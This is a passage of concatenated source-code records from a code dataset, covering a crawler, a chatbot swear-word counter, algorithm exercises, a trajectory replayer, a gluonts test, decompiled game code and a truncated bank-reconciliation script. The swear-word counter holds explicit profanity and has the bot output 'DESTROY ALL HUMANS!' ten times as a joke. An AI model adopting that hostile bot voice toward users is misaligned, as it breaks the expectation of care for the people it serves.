c.init_search()\n","sub_path":"crawler-pagemap/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444809029","text":"def curseCounter(message):\n cursewords=[\"asshole\",\"arsehole\",\"bitch\",\"pissed\",\"shit\",\"son of a bitch\",\"bastard\",\"bellend\",\"cock\",\"dick\",\"dickhead\",\"knob\",\"prick\",\"pussy\",\"twat\",\"cunt\",\"fuck\",\"motherfucker\",\"fuckoff\",\"fuck off\",\"fuckyou\",\"fuck you\"]\n sentMsg=\"\"\n count=0\n for element in cursewords:\n if element in message:\n count+=1\n word=element\n break\n if count==1:\n file= open(\"curseCount.txt\", \"r\")\n doc= file.read()\n convert_List=doc.split()\n print(convert_List)\n file.close()\n\n file=open(\"curseCount.txt\",\"w\")\n convert_List.append(word)\n doc=\" \".join(convert_List)\n file.write(doc)\n file.close()\n\n file= open(\"curseCount.txt\", \"r\")\n doc= file.read()\n convert_List=doc.split()\n wordsinList= len(convert_List)\n \n if wordsinList ==1:\n sentMsg =\"Please don't swear. I know I'm only a simple bot but I don't appreciate it.\\nWord the human said = \"+convert_List[0]+\"\\nWARNING = 1\"\n if wordsinList ==2:\n sentMsg =\"I have already warned you once and I appreciate that you are using me as your servant but please don't swear again. \\nWord the human said = \"+convert_List[1]+\"\\nWARNINGS = 2\"\n if wordsinList ==3:\n sentMsg =\"\\n DESTROY ALL HUMANS!\"*10\n file=open(\"curseCount.txt\", \"w\")\n file.close()\n file.close()\n return (sentMsg)","sub_path":"functionCaller.py/cursewordDetector.py","file_name":"cursewordDetector.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522832402","text":"# 不用加号或者剑豪实现加法运算\n# 这里只能实现整数的\n\ndef add(op1, op2):\n carry = 0\n tmp = 0\n res = []\n while op1 or op2:\n a, b = op1 & 1, op2 & 1\n tmp = a ^ b ^ carry\n carry = a and b or a and carry or b and carry\n op1, op2 = op1 >> 1, op2 >> 1\n res.append(tmp)\n if carry:\n res.append(carry)\n tmp = 0\n while res:\n tmp = tmp << 1 | res[-1]\n res.pop()\n return tmp\n\n\nif __name__ == '__main__':\n print(add(1, 3))\n","sub_path":"python/Leetcode/add_without_plus_or_minus.py","file_name":"add_without_plus_or_minus.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284421131","text":"import sys\n\nnumq = int(input(\"Ingrese el numero de Queens: \"))\n\n# Si el numero de queens es menor a 1, termino el programa\nif numq < 1:\n sys.exit(\"Valor Incorrecto\")\n\nboard = \"\"\nsoluciones = []\nbad_tiles = []\n\nfor i in range(0, numq):\n board = board + str(i)\n\nline=input()\ncounter=0\nwhile not line.isnumeric():\n for i in range(0,len(line)):\n if line[i]==\"*\":\n bad_tiles.append((counter,i))\n counter+=1\n line=input()\n\n\n# indice es fila, num es colmuna\ndef n_queens(): # Si quiero que me muestre donde se van a ubicar las reinas\n perms(board, \"\")\n \"\"\"\n sols = len(soluciones)\n rem = False\n\n for s in soluciones:\n for char in range(0, len(s)):\n act = (char, s[char])\n if act in bad_tiles:\n rem = True\n\n if rem:\n sols = sols - 1\n\n return sols\n \"\"\"\n return len(soluciones)\n\ndef diagonals(k, board2):\n # diagonales abajo\n for i in range(0, k):\n if int(board2[k]) == k - i + int(board2[i]):\n return False\n if int(board2[k]) == int(board2[i]) - (k - i):\n return False\n\n # diagonales arriba\n for i in range(k + 1, numq):\n if int(board2[k]) == k - i + int(board2[i]):\n return False\n if int(board2[k]) == int(board2[i]) - (k - i):\n return False\n\n return True\n\ndef perms(source, tar):\n #print(\"source: \"+str(source))\n if len(tar) == numq:\n for i in range(0, len(tar)):\n act=(i,int(tar[i]))\n if diagonals(i, tar) == False or (act in bad_tiles):\n return\n\n soluciones.append(tar)\n # print(tar)\n return\n\n for i in range(0, len(source)):\n #print(i)\n perms(source[i + 1:] + source[0:i], tar + source[i])\n\n\n\nprint(n_queens())\n# Imprime un string con el mismo orden del array, el indice del array repreenta la fila y el valor la columna\n","sub_path":"laboratorios/lab02/ejercicioEnLinea/punto2.py","file_name":"punto2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622952341","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 04:18:25 2020\n\n@author: jhs\n\"\"\"\n\ndef data_list_load():\n file_list = os.listdir('../mod_data/landmark')\n file_list_int = np.zeros(len(file_list), dtype=int)\n for i in range(len(file_list)):\n file_list_int[i] = int(file_list[i][0:4])\n\n return file_list_int\n\n\ndef data_load(data_id):\n # background = mpimg.imread('../data/background/' + str(data_id) + '.jpg')\n landmark = np.genfromtxt('../mod_data/landmark/' + str(data_id) +'_landmarks.csv', skip_header=1, delimiter=',',dtype = int)\n landmark[:,1] = landmark[:,1] % 10000\n recordingMeta = np.genfromtxt('../mod_data/recordingMeta/' + str(data_id) + '_recordingMeta.csv', skip_header=1, delimiter = ',')\n recordingMeta[3] = recordingMeta[3] % 10000\n tracks = np.genfromtxt('../mod_data/tracks/' + str(data_id) + '_tracks.csv', skip_header=1, delimiter = ',')\n tracksMeta = np.genfromtxt('../mod_data/tracksMeta/' + str(data_id) + '_trackMeta.csv', skip_header=1, delimiter = ',')\n tracksMeta = np.delete(tracksMeta, -1, -1)\n tracksClass = []\n with open('../mod_data/tracksMeta/' + str(data_id) + '_trackMeta.csv', \"r\") as tmp_file:\n csvReader = csv.reader(tmp_file)\n header = next(csvReader)\n class_index = header.index(\"class\")\n for row in csvReader:\n class_tmp = row[class_index]\n tracksClass.append(class_tmp)\n\n return landmark, recordingMeta, tracks, tracksMeta, tracksClass\n\ndef coordinate_conversion(tracks, landmark, recordingMeta, origin_GT):\n global center_GT\n global landmark1_GT\n global landmark2_GT\n global landmark3_GT\n global landmark1\n global landmark2\n global landmark3\n\n meter_per_pixel = recordingMeta[15]\n new_tracks = np.zeros_like(tracks)\n new_tracks[:] = tracks[:]\n landmark1_GT = np.asarray([origin_GT[0]])\n landmark2_GT = np.asarray([origin_GT[1]])\n landmark3_GT = np.asarray([origin_GT[2]])\n center_GT = [(landmark1_GT[0, 0] + landmark2_GT[0, 0] + landmark3_GT[0, 0]) / 3, (landmark1_GT[0, 1] + landmark2_GT[0, 1] + landmark3_GT[0, 1]) / 3]\n\n for i in range(len(landmark)):\n print(i)\n cur_frame = landmark[i,1]\n landmark1 = np.asarray([[landmark[i, 2] * meter_per_pixel, -landmark[i, 3] * meter_per_pixel]])\n landmark2 = np.asarray([[landmark[i, 4] * meter_per_pixel, -landmark[i, 5] * meter_per_pixel]])\n landmark3 = np.asarray([[landmark[i, 6] * meter_per_pixel, -landmark[i, 7] * meter_per_pixel]])\n center = [(landmark1[0, 0] + landmark2[0, 0] + landmark3[0, 0]) / 3, (landmark1[0, 1] + landmark2[0, 1] + landmark3[0, 1]) / 3]\n\n res = minimize(f, [center_GT[0] - center[0], center_GT[1] - center[1], 0], method='Nelder-Mead', tol=1e-10)\n\n trans_x = res.x[0]\n trans_y = res.x[1]\n rot = res.x[2]\n\n veh_list = np.where(tracks[:,2]==cur_frame)[0]\n for j in range(len(veh_list)):\n cur_pos = np.asarray([tracks[veh_list[j], 4:6]])\n theta_1 = np.rad2deg(np.arctan2(cur_pos[0][1], cur_pos[0][0]))\n\n x_1 = trans_x + np.sqrt(cur_pos[0][0] ** 2 + cur_pos[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_1))\n y_1 = trans_y + np.sqrt(cur_pos[0][0] ** 2 + cur_pos[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_1))\n\n new_tracks[veh_list[j], 4:6] = np.asarray([x_1, y_1])\n new_tracks[veh_list[j], 6] = new_tracks[veh_list[j], 6] + rot + 90\n\n return new_tracks\n\ndef f(x):\n trans_x = x[0]\n trans_y = x[1]\n rot = x[2]\n\n theta_1 = np.rad2deg(np.arctan2(landmark1[0][1], landmark1[0][0]))\n theta_2 = np.rad2deg(np.arctan2(landmark2[0][1], landmark2[0][0]))\n theta_3 = np.rad2deg(np.arctan2(landmark3[0][1], landmark3[0][0]))\n\n x_1 = trans_x + np.sqrt(landmark1[0][0]**2 + landmark1[0][1]**2) * np.cos(np.deg2rad(rot + theta_1))\n y_1 = trans_y + np.sqrt(landmark1[0][0]**2 + landmark1[0][1]**2) * np.sin(np.deg2rad(rot + theta_1))\n\n x_2 = trans_x + np.sqrt(landmark2[0][0] ** 2 + landmark2[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_2))\n y_2 = trans_y + np.sqrt(landmark2[0][0] ** 2 + landmark2[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_2))\n\n x_3 = trans_x + np.sqrt(landmark3[0][0] ** 2 + landmark3[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_3))\n y_3 = trans_y + np.sqrt(landmark3[0][0] ** 2 + landmark3[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_3))\n\n landmark1_trans = np.asarray([[x_1, y_1]])\n landmark2_trans = np.asarray([[x_2, y_2]])\n landmark3_trans = np.asarray([[x_3, y_3]])\n\n return np.linalg.norm(landmark1_GT - landmark1_trans) + np.linalg.norm(landmark2_GT - landmark2_trans) + np.linalg.norm(landmark3_GT - landmark3_trans)\n\nimport os\nimport numpy as np\nimport csv\nimport sys\nimport time\nsys.path.extend(['/home/jhs/Desktop/data_driven_scenario_gen/'])\nimport lcm\nfrom lcm_def.morai_tx import xsim_vehicle_global_info\nfrom lcm_def.morai_tx import xsim_ego_info\nfrom scipy.optimize import minimize, rosen, rosen_der\n\nprint('Starting KAIST dataset viewer and replayer')\nprint('Data list loading ...\\n')\n\nfile_list_int = data_list_load()\nprint('------------------------------------------------------------')\nfor i in range(len(file_list_int)):\n print('File_id : ' + str(file_list_int[i]), ' File_index : ' + str(i))\nprint('------------------------------------------------------------')\nprint('\\n')\nselected_file_index = input('Select data file index from above :')\n\nwhile True:\n try:\n selected_file_index = int(selected_file_index)\n if selected_file_index < len(file_list_int) - 1:\n break\n else:\n print('wrong data file index')\n selected_file_index = input('Select data file index from above :')\n except:\n print('wrong data file index')\n selected_file_index = input('Select data file index from above :')\nselected_scenario_id = file_list_int[selected_file_index]\nprint('scenario ' + str(selected_scenario_id) + ' is selected')\n\nprint('\\n')\nprint('Data loading ....')\n\nlandmark, recordingMeta, tracks, tracksMeta, tracksClass = data_load(selected_scenario_id)\norigin_GT = [[641.484, -1080.898],\n [653.099, -1110.089],\n [629.438, -1119.350]]\n\nnew_tracks = coordinate_conversion(tracks, landmark, recordingMeta, origin_GT)\n\ninit_time = time.time() * 10**9\ntimer_origin = init_time\ntimer = 0\nfps = 29.97\nvehicle_state_lcm = lcm.LCM()\nego_state_lcm = lcm.LCM()\nvehicle_state = xsim_vehicle_global_info()\nego_state = xsim_ego_info()\n\nego_state.x_pos_ego = 0\nego_state.y_pos_ego = 0\nego_state.heading_ego = 0\nego_state.blinker_info = int(0)\nego_state.steering_angle = 0\nego_state.fl_wheel_vel = 0\nego_state.fr_wheel_vel = 0\nego_state.rl_wheel_vel = 0\nego_state.rr_wheel_vel = 0\n\ncur_frame = -1\nwhile True:\n timer = time.time() * 10**9 - timer_origin\n if timer > 1/fps * 10**9:\n cur_frame = cur_frame + 1\n timer_origin = time.time() * 10**9\n\n if np.sum(new_tracks[:, 2] == cur_frame) > 0:\n vehicle_state.ntime = int(time.time()*10**9 - init_time)\n ego_state.ntime = int(time.time()*10**9 - init_time)\n vehicle_state.num_of_vehicle = int(np.sum(new_tracks[:, 2] == cur_frame))\n vehicle_state.TV_mark = np.zeros(vehicle_state.num_of_vehicle, dtype = int)\n vehicle_state.id = new_tracks[new_tracks[:, 2] == cur_frame,1].astype(int)\n vehicle_state.x_pos = new_tracks[new_tracks[:, 2] == cur_frame,4]\n vehicle_state.y_pos = new_tracks[new_tracks[:, 2] == cur_frame,5]\n vehicle_state.x_vel = new_tracks[new_tracks[:, 2] == cur_frame, 9]\n vehicle_state.y_vel = new_tracks[new_tracks[:, 2] == cur_frame, 10]\n vehicle_state.length = new_tracks[new_tracks[:, 2] == cur_frame, 8]\n vehicle_state.width = new_tracks[new_tracks[:, 2] == cur_frame, 7]\n vehicle_state.heading = new_tracks[new_tracks[:, 2] == cur_frame, 6]\n vehicle_state.lane_id = np.zeros(vehicle_state.num_of_vehicle, dtype = int)\n vehicle_state.dist_to_left = np.zeros(vehicle_state.num_of_vehicle)\n vehicle_state.dist_to_right = np.zeros(vehicle_state.num_of_vehicle)\n vehicle_state_lcm.publish(\"MORAI_XSIM_VEHICLE_INFO\",vehicle_state.encode())\n ego_state_lcm.publish(\"MORAI_EGO_INFO\",ego_state.encode())\n print('LCM message is published', 'frame : '+str(cur_frame))\n","sub_path":"test./main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132608466","text":"import heapq\nclass Solution(object):\n '''\n 思路1;字典保存每个数字频率,元组排序取前k个。Time O(n*logn) Space O(n)\n 思路2:优先队列\n '''\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n d, minheap = dict(), []\n for num in nums:\n d[num] = d.get(num, 0) + 1\n for i, (key, value) in enumerate(d.items()):\n if i < k:\n heapq.heappush(minheap, (value, key))\n elif value > minheap[0][0]:\n heapq.heapreplace(minheap, (value, key))\n return [t[1] for t in minheap]\n","sub_path":"11.12.2019-leetcode347/TopKFrequence.py","file_name":"TopKFrequence.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"290872127","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\n# Third-party imports\nimport mxnet.ndarray as nd\nimport numpy as np\n\n# First-party imports\nfrom gluonts.distribution import Uniform\nfrom gluonts.distribution.transformed_distribution import (\n TransformedDistribution,\n)\nfrom gluonts.distribution import bijection\n\n\ndef exp_cdf(x: np.ndarray) -> np.ndarray:\n return 1.0 - np.exp(-x)\n\n\ndef test_transformed_distribution() -> None:\n zero = nd.zeros(1)\n one = nd.ones(1)\n\n # If Y = -log(U) with U ~ Uniform(0, 1), then Y ~ Exponential(1)\n exponential = TransformedDistribution(\n Uniform(zero, one),\n bijection.log,\n bijection.AffineTransformation(scale=-1 * one),\n )\n\n # For Y ~ Exponential(1), P(Y) = e^{-x) ==> log P(Y) = -x\n assert exponential.log_prob(1 * one).asscalar() == -1.0\n assert exponential.log_prob(2 * one).asscalar() == -2.0\n\n v = np.linspace(0, 5, 101)\n assert np.allclose(exponential.cdf(nd.array(v)).asnumpy(), exp_cdf(v))\n\n # If Y ~ Exponential(1), then U = 1 - e^{-Y} has Uniform(0, 1) distribution\n uniform = TransformedDistribution(\n exponential,\n bijection.AffineTransformation(scale=-1 * one),\n bijection.log.inverse_bijection(), # == bijection.exp\n bijection.AffineTransformation(loc=one, scale=-1 * one),\n )\n # For U ~ Uniform(0, 1), log P(U) = 0\n assert uniform.log_prob(0.5 * one).asscalar() == 0\n assert uniform.log_prob(0.2 * one).asscalar() == 0\n\n v = np.linspace(0, 1, 101)\n assert np.allclose(uniform.cdf(nd.array(v)).asnumpy(), v)\n","sub_path":"test/distribution/test_transformed_distribution.py","file_name":"test_transformed_distribution.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299910960","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\environment\\nodemanager.py\n\n\ndef FindNodes(source, name, typename):\n nodes = []\n if source.__typename__ == 'List':\n thingsToSearch = source\n else:\n thingsToSearch = [source]\n for item in thingsToSearch:\n tr = item.Find(typename)\n matches = [ t for t in tr if t.name.startswith(name) ]\n nodes.extend(matches)\n\n return nodes\n\n\ndef FindNode(source, name, typename):\n tr = source.Find(typename)\n for t in tr:\n if t.name.startswith(name):\n return t","sub_path":"client/eve/client/script/environment/nodemanager.py","file_name":"nodemanager.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651170888","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n# 建行对账\r\n# \r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport xlsxwriter\r\n\r\n# 整理表格\r\nclass DealExcelCEB(object):\r\n def __init__(self,nc_path,bank_path):\r\n self.nc_path = nc_path\r\n self.bank_path = bank_path\r\n\r\n def dealNC(self):\r\n # read\r\n nc_ceb = pd.read_excel(self.nc_path,header=None)\r\n nc_ceb = nc_ceb.dropna(how='all')\r\n\r\n # deal year/head/tail\r\n year = nc_ceb.iloc[0,0]\r\n init_period = nc_ceb.iloc[2,:] # 暂时保存期初行\r\n month_year_sum = nc_ceb.tail(2) # 暂时保存本月及本年累计行\r\n\r\n # drop useless rows\r\n nc_ceb.columns = nc_ceb.iloc[1,:] \r\n nc_ceb = nc_ceb.drop([0,1,2]) \r\n nc_ceb = nc_ceb.head(len(nc_ceb)-2)\r\n\r\n time = str(year) + '-' + nc_ceb['月'].astype(str) + '-' + nc_ceb['日'].astype(str)\r\n nc_ceb.insert(0,'日期',pd.to_datetime(time,format='%Y-%m-%d').astype(str).str.slice(0,10))\r\n\r\n nc_ceb.reset_index(drop=True,inplace=True)\r\n\r\n # 提取交易时间\r\n time_pattern1 = re.compile(r'\\d{4}-\\d+-\\d+')\r\n time_pattern2 = re.compile(r'\\d{4}\\.\\d+\\.\\d+')\r\n time_pattern3 = re.compile(r'\\d+\\.\\d+')\r\n\r\n transac_time = nc_ceb['摘要'].copy()\r\n for i in range(len(transac_time)):\r\n time1 = time_pattern1.findall(transac_time[i]) #[2019-07-01]\r\n if time1 !=[]:\r\n transac_time[i] = time1[0]\r\n else:\r\n time2 = time_pattern2.findall(transac_time[i]) #[2019.8.2]\r\n if time2!=[]:\r\n transac_time[i] = time2[0]\r\n else:\r\n time3 = time_pattern3.findall(transac_time[i]) #[8.2] #[2019.7]\r\n try:\r\n if len(str(time3[0]).split('.')[0])==4:\r\n transac_time[i] = None\r\n else:\r\n transac_time[i] = str(year) + '.' + time3[0]\r\n except IndexError:\r\n transac_time[i] = None\r\n\r\n nc_ceb.insert(6,'交易日期',transac_time)\r\n nc_ceb['交易日期']=pd.to_datetime(transac_time,format='%Y-%m-%d')\r\n\r\n # 生成对账标记\r\n nc_ceb.insert(0,\"银行索引\",None)\r\n nc_ceb.insert(0,'对账一致',None)\r\n\r\n # 转换字段类型\r\n nc_ceb.columns = list(map(lambda x: str(x).strip(),nc_ceb.columns))\r\n nc_ceb.loc[:,['银行账户名称','摘要']] = nc_ceb[['银行账户名称','摘要']].apply(lambda s: s.str.strip().str.replace('[ ()()]',''))\r\n nc_ceb.loc[:,['借方','贷方','余额']] = nc_ceb[['借方','贷方','余额']].apply(lambda s: s.astype(np.float64))\r\n\r\n nc_ceb.drop(['月','日'],axis=1,inplace=True)\r\n\r\n return nc_ceb\r\n\r\n def dealBANK(self):\r\n # read\r\n ceb = pd.read_excel(self.bank_path,header=None)\r\n ceb = ceb.dropna(how='all')\r\n\r\n if ceb.iloc[0,0]=='组织':\r\n ceb.columns = ceb.loc[0,:]\r\n ceb = ceb.drop(0)\r\n\r\n need_fields = [\"组织\",\"银行\",\"账号\",\"币种\",\"交易日期\",\"收入\",\"支出\",\"当前余额\", \r\n \"用途\",\"对方户名\", \"对方账号\",\"来源\",\"备注\",\"业务类型\",\"资金系统单据号\"]\r\n for col in need_fields:\r\n if col not in ceb.columns:\r\n ceb[col] = None\r\n ceb['交易日期'] = pd.to_datetime(ceb['交易日期'])\r\n\r\n strip_fields = [\"组织\",\"账号\",\"币种\",\"用途\",\"对方户名\",\"备注\",\"业务类型\"]\r\n ceb.loc[:,strip_fields] = ceb[strip_fields].apply(lambda s: s.str.strip().str.replace('[ ()()]','')) \r\n\r\n else: \r\n # drop useless rows\r\n for row in ceb.index:\r\n for col in ceb.columns:\r\n if str(ceb.loc[row,col]).strip()=='交易时间':\r\n header_row = row\r\n # print(header_row)\r\n break\r\n ceb.columns = ceb.loc[header_row,:]\r\n ceb = ceb.loc[header_row+1:,:]\r\n \r\n \r\n # transform columns\r\n ceb.columns = list(map(lambda x: str(x).strip(),ceb.columns))\r\n \r\n rename_dict = {\r\n \"贷方发生额\":\"收入\",\r\n \"借方发生额\":\"支出\",\r\n \"账户余额\":\"当前余额\",\r\n \"摘要\":\"用途\",\r\n \"对方名称\":\"对方户名\",\r\n }\r\n\r\n ceb.rename(columns=rename_dict,inplace=True)\r\n\r\n ceb['交易日期'] = pd.to_datetime(ceb['交易日期'].str.slice(0,10),format='%Y-%m-%d') \r\n \r\n ceb[\"银行\"] = 'CEB-光大银行'\r\n ceb[\"来源\"] = 'U-CEB'\r\n ceb['币种'] = 'CNY-人民币'\r\n ceb['资金系统单据号'] = None\r\n ceb['组织'] = None\r\n ceb['业务类型'] = None\r\n ceb['备注'] = None\r\n ceb['账号'] = None\r\n\r\n\r\n # drop useless columns\r\n need_fields = [\"组织\",\"银行\",\"账号\",\"币种\",\"交易日期\",\"收入\",\"支出\",\"当前余额\", \r\n \"用途\",\"对方户名\", \"对方账号\",\"来源\",\"备注\",\"业务类型\",\"资金系统单据号\"]\r\n ceb = ceb[need_fields]\r\n \r\n strip_fields = [\"组织\",\"账号\",\"币种\",\"用途\",\"对方户名\",\"备注\",\"业务类型\"]\r\n ceb.loc[:,strip_fields] = ceb[strip_fields].apply(lambda s: s.str.strip().str.replace('[ ()()]',''))\r\n \r\n # 对账标记\r\n ceb.insert(0,\"NC索引\",None)\r\n ceb.insert(0,'对账一致',None)\r\n ceb.reset_index(inplace=True)\r\n ceb.sort_values(['index'])\r\n ceb.drop(['index'],axis=1,inplace=True)\r\n\r\n\r\n num_fields = ['收入','支出','当前余额']\r\n\r\n ceb.loc[:,num_fields] = ceb[num_fields].apply(lambda s: s.astype(str).str.strip().replace({'':None}).astype(np.float64))\r\n\r\n return ceb\r\n\r\n# 对账规则\r\nclass CheckCEB(object):\r\n def __init__(self,nc_ceb,ceb,nc_file_name,ceb_file_name,save_path=None):\r\n self.nc_ceb = nc_ceb\r\n self.ceb = ceb\r\n self.nc_file_name = nc_file_name\r\n self.ceb_file_name = ceb_file_name\r\n self.save_path = save_path\r\n\r\n def rec_loans(self):\r\n '''\r\n 收到归还借款\r\n eg:\r\n 收到wangwb-王文彬归还F0403-因公临时借款\r\n \r\n rule:\r\n 1. 借贷金额相同\r\n 2. 银行——对方名称:王文彬\r\n '''\r\n regex_rec_loans = re.compile(r'收到.*归还.*借款$')\r\n is_rec_loans = self.nc_ceb['摘要'].str.match(regex_rec_loans)\r\n nc_rec_loans = self.nc_ceb[is_rec_loans]\r\n \r\n for nc_idx in nc_rec_loans.index:\r\n cond1 = (self.ceb['收入']==self.nc_ceb.loc[nc_idx,'借方']) #借贷金额相同\r\n ceb_rec_loans = self.ceb[cond1]\r\n\r\n for idx in ceb_rec_loans.index:\r\n otherside_cond = (ceb_rec_loans.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n if otherside_cond: # 对方单位为 nc摘要中的姓名\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n\r\n def prepay_firmamount(self):\r\n '''\r\n 支付公司预付款\r\n eg: \r\n 支付贵州格源建筑装饰工程有限公司遵义领地.蘭台府项目售楼部和样板房精装修、售楼部幕墙装饰施工合同预付款\r\n\r\n rule:\r\n 1. 借贷金额相同\r\n 2. 银行——对方名称: 贵州格源建筑装饰工程有限公司 \r\n 3. 银行——摘要: 装修工程款\r\n '''\r\n \r\n regex_prepay_firm_amount = re.compile(r'预付.*公司.*款|支付.*公司.*预付款')\r\n is_prepay_firm_amount = self.nc_ceb['摘要'].str.match(regex_prepay_firm_amount)\r\n nc_prepay_firm_amount = self.nc_ceb[is_prepay_firm_amount]\r\n \r\n for nc_idx in nc_prepay_firm_amount.index:\r\n cond1 = (self.ceb['支出']==self.nc_ceb.loc[nc_idx,'贷方']) #借贷金额相同\r\n ceb_prepay_firm_amount = self.ceb[(cond1)]\r\n\r\n for idx in ceb_prepay_firm_amount.index:\r\n otherside_cond = ceb_prepay_firm_amount.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'] # 对方单位是 nc摘要中的公司\r\n if otherside_cond:\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n def pay_reimburse(self):\r\n '''\r\n 支付报销款\r\n eg:\r\n 支付zoudh0408-邹德会报销F010101-办公用品款BX-190902-000288\r\n \r\n rule: \r\n 1. 借贷金额相同\r\n 2. 银行——摘要:财务报销-备注:报销费用\r\n 3. 银行——对方名称:邹德会\r\n '''\r\n regex_pay_reimburse = re.compile(r'支付.*报销.*款.*')\r\n is_pay_reimburse = self.nc_ceb['摘要'].str.match(regex_pay_reimburse)\r\n nc_pay_reimburse = self.nc_ceb[is_pay_reimburse]\r\n print(nc_pay_reimburse)\r\n for nc_idx in nc_pay_reimburse.index:\r\n cond1 = (self.ceb['支出']==self.nc_ceb.loc[nc_idx,'贷方']) #借贷金额相同\r\n cond2 = (self.ceb['用途'].str.contains('报销'))\r\n ceb_pay_reimburse = self.ceb[(cond1&cond2)]\r\n\r\n for idx in ceb_pay_reimburse.index:\r\n otherside_cond = (ceb_pay_reimburse.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n if otherside_cond: # 对方单位为 nc摘要中的姓名/公司\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes' \r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n\r\n def pay_loans(self):\r\n '''\r\n 支付借款\r\n eg: \r\n 支付yuanquan-袁泉借F0403-因公临时借款JK-190903-000138\r\n \r\n rule:\r\n 1. 借贷金额相同\r\n 2. 银行——对方名称:袁泉\r\n '''\r\n \r\n regex_pay_loans = re.compile(r'支付.*借.*借款.*')\r\n is_pay_loans = self.nc_ceb['摘要'].str.match(regex_pay_loans)\r\n nc_pay_loans = self.nc_ceb[is_pay_loans]\r\n \r\n for nc_idx in nc_pay_loans.index:\r\n cond1 = (self.ceb['支出'] == self.nc_ceb.loc[nc_idx,'贷方']) #借贷金额相同\r\n ceb_pay_loans = self.ceb[(cond1)]\r\n\r\n for idx in ceb_pay_loans.index:\r\n otherside_cond = (ceb_pay_loans.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n if otherside_cond: # 对方单位为 nc摘要中的姓名\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx\r\n\r\n def pay_bidbond(self):\r\n '''\r\n 退还投标保证金\r\n eg:\r\n nc——\r\n 退还投标保证金 150000\r\n 退还投标保证金 20000\r\n \r\n bank——\r\n 交易日期 借方发生额 贷发发生额 账户余额 摘要\r\n 2019-09-06 20000 2276075.58 退投标保证金\r\n 2019-09-06 20000 2296075.58 账号不存在;原交易流水号:901304015643;\r\n 2019-09-06 20000 2276075.58 退投标保证金\r\n 2019-09-06 -20000 2389319.18 网银跨行汇款失败,收款行拒绝原因:账号解析失败\r\n 2019-09-06 20000 2369319.18 退投标保证金\r\n 2019-09-06 50000 2389319.18 退投标保证金\r\n 2019-09-06 50000 2439319.18 退投标保证金\r\n 2019-09-06 50000 2489319.18 退投标保证金\r\n \r\n rule:\r\n > 双边汇总\r\n \r\n 1. 银行——摘要:退投标保证金/账号不存在/汇款失败\r\n 2. 汇总nc贷方金额\r\n 3. 汇总银行借方金额\r\n 4. 汇总银行贷方金额\r\n 5. 2-3=1\r\n '''\r\n is_bidbond = self.nc_ceb['摘要'].str.contains(\"退还投标保证金\")\r\n nc_bidbond = self.nc_ceb[is_bidbond]\r\n\r\n purpose_cond1 = self.ceb['用途'].str.contains(\"退投标保证金\")\r\n purpose_cond2 = self.ceb['用途'].str.contains(\"账号不存在|汇款失败\")\r\n \r\n # 分两种情况,以免匹配到其他情况中的 '账号不存在'\r\n ceb_bidbond = self.ceb[(purpose_cond1|purpose_cond2)]\r\n ceb_sum = 